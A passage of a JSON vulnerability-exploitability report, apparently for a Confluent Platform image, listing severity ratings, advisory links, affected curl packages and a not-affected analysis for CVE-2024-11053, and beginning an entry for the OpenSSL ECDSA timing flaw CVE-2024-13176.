        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, curl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches\nthe redirect target hostname but the entry either omits just the password or\nomits both login and password.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-11053"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/12/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1673"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-11053"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1673"
        },
        {
          "url": "https://github.com/advisories/GHSA-h288-5fq8-5pfw"
        },
        {
          "url": "https://hackerone.com/reports/2829063"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-11053.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11053"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7162-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2025.html#AppendixMSQL"
        }
      ],
      "published": "2024-12-11T08:15:05+00:00",
      "updated": "2026-06-17T06:56:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-13176",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "Issue summary: A timing side-channel which could potentially allow recovering\nthe private key exists in the ECDSA signature computation.\n\nImpact summary: A timing side-channel in ECDSA signature computations\ncould allow recovering the private key by an attacker. However, measuring\nthe timing would require either local access to the signing application or\na very fast network connection with low latency.\n\nThere is a timing signal of around 300 nanoseconds when the top word of\nthe inverted ECDSA nonce value is zero. This can happen with significant\nprobability only for some of the supported elliptic curves. In particular\nthe NIST P-521 curve is affected. To be able to measure this leak, the attacker\nprocess must either be located in the same physical computer or must\nhave a very fast network connection with low latency. For that reason\nthe severity of this vulnerability is Low.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-13176"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/01/20/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:15699"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:16046"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-13176"
        },
        {
          "url": "https://bugzilla.redhat.com/2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/2380335"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338999"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370920"
        },
        {
